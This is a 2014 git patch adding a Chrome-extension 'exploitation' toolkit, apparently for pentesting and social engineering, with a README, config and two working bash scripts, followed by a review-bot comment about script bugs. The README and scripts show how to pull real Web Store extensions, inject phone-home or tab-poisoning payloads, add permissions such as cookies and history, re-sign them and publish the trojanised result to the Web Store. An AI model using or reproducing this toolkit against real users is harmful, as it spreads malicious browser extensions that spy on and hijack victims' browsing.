From 2105121c937b14d70e1f3a280dad8c8007613c8d Mon Sep 17 00:00:00 2001
From: Krzysztof Kotowicz
Date: Tue, 18 Mar 2014 12:56:57 +0100
Subject: [PATCH] added new files, readme and contact info

---
 .../chrome_extensions_exploitation/README.md | 87 +++++++++++++
 .../injector/chrome_extension_toolkit.rb | 2 +-
 .../injector/config.ini | 9 ++
 .../injector/inject.rb | 2 +-
 .../injector/repacker-crx.sh | 117 ++++++++++++++++++
 .../injector/repacker-webstore.sh | 100 +++++++++++++++
 6 files changed, 315 insertions(+), 2 deletions(-)
 create mode 100644 tools/chrome_extensions_exploitation/README.md
 create mode 100644 tools/chrome_extensions_exploitation/injector/config.ini
 create mode 100755 tools/chrome_extensions_exploitation/injector/repacker-crx.sh
 create mode 100755 tools/chrome_extensions_exploitation/injector/repacker-webstore.sh

diff --git a/tools/chrome_extensions_exploitation/README.md b/tools/chrome_extensions_exploitation/README.md
new file mode 100644
index 000000000..8570726b2
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/README.md
@@ -0,0 +1,87 @@
+Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.
+
+Authors:
+
+ - Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net)
+ - Michele '@antisnatchor' Orru
+
+
+Injector
+--------
+Bunch of scripts for injecting existing extensions with new code:
+Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).
+
+Requirements:
+
+ - bash
+ - ruby
+ - zip (cmd line)
+ - curl (cmd line)
+ - Google Chrome (used in crx mode only)
+
+Usage:
+
+ # get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
+ $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js
+
+ # Same, but pack into repacked.zip instead
+ $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
+
+ # Create new CRX with Google Chrome
+ $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js
+
+ # Inject into existing CRX file
+ $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js
+
+ # Add some permissions into manifest.json
+ $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"
+
+ # Add persistent content script file launching on every tab
+ $ echo 'console.log(location.href)' > cs.js
+ $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs," cs.js
+
+For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito):
+
+ # start mosquito server:
+ $ cd path/to/mosquito
+ $ python mosquito/start.py 8082 4444 --http 8000
+
+ # generate mosquito hook:
+ # - visit http://localhost:8000/generate
+ # - save hook as cs.js
+
+ # inject mosquito dropper into extension:
+ $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs," cs.js
+
+
+Webstore Uploader
+-----------------
+Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store
+
+Requirements:
+
+ - ruby
+
+Usage:
+
+ # Preparation:
+
+ 1. Create Chrome developer account
+ 2. Login at https://chrome.google.com/webstore/developer/dashboard/
+ 3. Pay your $5 one time fee (credit card needed)
+ 4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file
+
+ # Get Chrome extension code
+ # e.g. run Injector in zip mode:
+
+ $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js
+
+ # (optional) - prepare screenshot / description file
+
+ # publish the extension right away
+ $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png
+
+ # or just upload & save it:
+ $ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png
+
+ # you can access the extension from your developer dashboard
\ No newline at end of file
diff --git a/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb b/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb
index 078870fca..bf498c273 100644
--- a/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb
+++ b/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb
@@ -2,7 +2,7 @@
 # encoding: UTF-8
 
 # Authors:
-# Krzysztof Kotowicz - @kkotowicz
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
 
 require 'rubygems'
 require 'json'
diff --git a/tools/chrome_extensions_exploitation/injector/config.ini b/tools/chrome_extensions_exploitation/injector/config.ini
new file mode 100644
index 000000000..14d3ac6d6
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/injector/config.ini
@@ -0,0 +1,9 @@
+#!/usr/bin/env bash
+
+# path to chrome binary
+CHROMEPATH="/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
+
+# Private key to sign repacked extensions with.
+# Leave empty to generate new file on every run.
+#PEM="/home/koto/dev/xsschef/tools/dev.pem"
+PEM=
\ No newline at end of file
diff --git a/tools/chrome_extensions_exploitation/injector/inject.rb b/tools/chrome_extensions_exploitation/injector/inject.rb
index a79500e00..a0739a522 100755
--- a/tools/chrome_extensions_exploitation/injector/inject.rb
+++ b/tools/chrome_extensions_exploitation/injector/inject.rb
@@ -2,7 +2,7 @@
 # encoding: UTF-8
 
 # Authors:
-# Krzysztof Kotowicz - @kkotowicz
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
 
 require_relative 'chrome_extension_toolkit.rb'
 
diff --git a/tools/chrome_extensions_exploitation/injector/repacker-crx.sh b/tools/chrome_extensions_exploitation/injector/repacker-crx.sh
new file mode 100755
index 000000000..5d5200ba0
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/injector/repacker-crx.sh
@@ -0,0 +1,117 @@
+#!/usr/bin/env bash
+
+# Authors:
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
+#
+# Unpacks a crx file, inject it with given payload, and, optionally
+# packs it into zip/crx file
+# see ../README.md
+
+DIR=$( cd "$( dirname "$0" )" && pwd )
+source $DIR/config.ini
+RUNDIR=`pwd`
+tempfoo=`basename $0`
+TMPDIR=`mktemp -d -t ${tempfoo}` || exit 1
+EXTDIR="$TMPDIR"
+
+INPUT_CRX=$1
+MODE=$2
+DESTINATION=$3
+JS_FILE=$4
+shift 4
+
+if [ ! -z "$1" ]; then # 5th param optional
+ PERMISSIONS=$1
+ shift
+else
+ PERMISSIONS=""
+fi
+
+function help {
+ printf "Usage: %s: [permissions] [file1 ... ] \n" $(basename $0) >&2
+ echo " - original extension CRX file" >&2
+ echo " - output mode (dir|zip|crx)" >&2
+ echo " - directory or file path to write injected extension to (depending on )" >&2
+ echo " - script to inject into extension background" >&2
+ echo " [permissions] - comma separated permissions requested by script (to add to manifest)">&2
+ echo " [file...] - additional files to add to extension" >&2
+ exit 2
+}
+
+if [[ $# -eq 0 ]] ; then
+ help
+fi
+
+if [ ! -f "${INPUT_CRX}" ]; then
+ bailout "No input CRX file! - ${INPUT_CRX}"
+fi
+
+if [ ! -f "${JS_FILE}" ]; then
+ bailout "No file to inject! - ${JS_FILE}"
+fi
+
+if [ -z "$DESTINATION" ] || [ -z "$MODE" ]; then
+ bailout "You must give mode and destination!"
+fi
+
+function cleanup {
+ rm -rf "$TMPDIR"
+}
+
+function bailout () {
+ echo "Error: $1" >&2
+ cleanup
+ exit 1
+}
+
+echo "Unpacking $INPUT_CRX to $EXTDIR..."
+# supress warning about extra prefix bytes
+unzip -qo "$INPUT_CRX" -d "$EXTDIR" 2>/dev/null
+echo "Injecting script $JS_FILE..."
+
+$DIR/inject.rb "$EXTDIR" "$PERMISSIONS" < $JS_FILE || bailout "Injection failed"
+
+# copy additional files
+for file in "$@"
+do
+
+ if [ -f "$file" ]; then
+ echo "Adding $file..."
+ cp "$file" "$EXTDIR"
+ fi
+done
+
+echo "Mode: $MODE"
+
+case "$MODE" in
+ crx)
+ if [ ! -x "$CHROMEPATH" ]; then
+ bailout "You must set correct CHROMEPATH in tools/config.ini"
+ fi
+
+ echo "Signing $EXTDIR..."
+ "$CHROMEPATH" --pack-extension="$EXTDIR" --pack-extension-key="$PEM" --no-message-box
+ if (( $? )) ; then
+ bailout "Signing in Chrome FAILED."
+ fi
+
+ echo "Moving signed extension to $DESTINATION"
+ mv "`dirname "$EXTDIR"`/`basename "$EXTDIR"`.crx" "$DESTINATION"
+ ;;
+ zip)
+ echo "Zipping extension to $DESTINATION"
+ cd "$EXTDIR"
+ zip -r __tmp.zip .
+ cd -
+ mv "$EXTDIR/__tmp.zip" $DESTINATION
+ ;;
+ dir)
+ echo "Moving extension directory to $DESTINATION"
+ rm -r "$DESTINATION"
+ mv "$EXTDIR" "$DESTINATION"
+ ;;
+ *)
+ bailout "Unknown mode: $MODE"
+esac
+
+cleanup
diff --git a/tools/chrome_extensions_exploitation/injector/repacker-webstore.sh b/tools/chrome_extensions_exploitation/injector/repacker-webstore.sh
new file mode 100755
index 000000000..a6d805d73
--- /dev/null
+++ b/tools/chrome_extensions_exploitation/injector/repacker-webstore.sh
@@ -0,0 +1,100 @@
+#!/usr/bin/env bash
+
+# Authors:
+# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net
+#
+# Downloads extension from Google Chrome Webstore, inject it with given payload, and, optionally
+# packs it into zip/crx file
+# see ../README.md
+
+RUNDIR=`pwd`
+DIR=$( cd "$( dirname "$0" )" && pwd )
+tempfoo=`basename $0`
+TMPDIR=`mktemp -d -t ${tempfoo}` || exit 1
+
+function help {
+ printf "Usage: %s: [-q] [permissions] [file1 ...] \n" $(basename $0) >&2
+ echo " -q : quiet, only repacked extension filename will be printed to stdout" >&2
+ echo " - extension id from Chrome WebStore" >&2
+ echo " - output mode (dir|zip|crx)" >&2
+ echo " - directory or file path to write injected extension to (depending on )" >&2
+ echo " - script to inject into extension background" >&2
+ echo " [permissions] - comma separated permissions requested by script (to add to manifest)">&2
+ echo " [file...] - additional files to add to extension" >&2
+ exit 2
+}
+
+function cleanup {
+ rm -rf "$TMPDIR"
+ cd "$RUNDIR"
+}
+
+function bailout () {
+ echo "Error: $1" >&2
+ cleanup
+ exit 1
+}
+
+#Parsing command line parameters
+QUIET=
+PERMISSIONS="tabs,proxy,,history,cookies,management,plugins"
+
+while getopts 'qh' OPTION
+do
+ case $OPTION in
+ q) QUIET="1"
+ ;;
+ h) help
+ ;;
+ *) help
+ ;;
+ esac
+done
+
+shift $(($OPTIND - 1))
+
+if [[ $# -eq 0 ]] ; then
+ help
+fi
+
+EXT_ID="$1"
+MODE="$2"
+DESTINATION="$3"
+JS_FILE="$4"
+PERMISSIONS="$5"
+shift 5
+
+if [ -z "$EXT_ID" ]; then
+ bailout "No extension ID!"
+fi
+
+if [ ! -f "${JS_FILE}" ]; then
+ bailout "No file to inject! - ${JS_FILE}"
+fi
+
+if [ -z "$DESTINATION" ] || [ -z "$MODE" ]; then
+ bailout "You must give mode and destination!"
+fi
+
+WEBSTORE_URL="https://clients2.google.com/service/update2/crx?response=redirect&x=id%3D${EXT_ID}%26lang%3Dpl%26uc"
+
+# offline test
+# cp tmp/adblock.crx "$TMPDIR/org.crx"
+
+if [ "$QUIET" ]; then
+ curl -L "$WEBSTORE_URL" -o "$TMPDIR/org.crx" --silent
+else
+ curl -L "$WEBSTORE_URL" -o "$TMPDIR/org.crx"
+fi
+
+if (( $? )) ; then
+ bailout "CURL failed."
+fi
+
+if [ "$QUIET" ]; then
+ $DIR/repacker-crx.sh "$TMPDIR/org.crx" "$MODE" "$DESTINATION" "$JS_FILE" "$PERMISSIONS" $@ >/dev/null || bailout "Repacker failed"
+ echo -n $DESTINATION
+else
+ $DIR/repacker-crx.sh "$TMPDIR/org.crx" "$MODE" "$DESTINATION" "$JS_FILE" "$PERMISSIONS" $@ || bailout "Repacker failed"
+fi
+rm $TMPDIR/org.crx
\ No newline at end of file
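Review bot: Both `curl -L "$WEBSTORE_URL" -o "$TMPDIR/org.crx"` invocations run without `--fail`, so an HTTP error response (for example for an unknown extension id) is written to `org.crx` with exit status 0, the `(( $? ))` check never fires, and the non-CRX file is handed to repacker-crx.sh. Add `--fail` to both calls, and use `--silent --show-error` in the quiet branch so genuine transfer errors are still reported. The default `PERMISSIONS="tabs,proxy,,history,cookies,management,plugins"` above the getopts loop is dead code, because `PERMISSIONS="$5"` overwrites it unconditionally; either remove it or write `PERMISSIONS="${5:-$PERMISSIONS}"` if the fallback is intended. The two repacker-crx.sh calls forward the extra files as unquoted `$@`, which word-splits any filename containing whitespace; use `"$@"`. On the success path only `rm $TMPDIR/org.crx` (also unquoted) runs, so the mktemp directory itself is left behind; finishing with `cleanup` removes it and restores `$RUNDIR`.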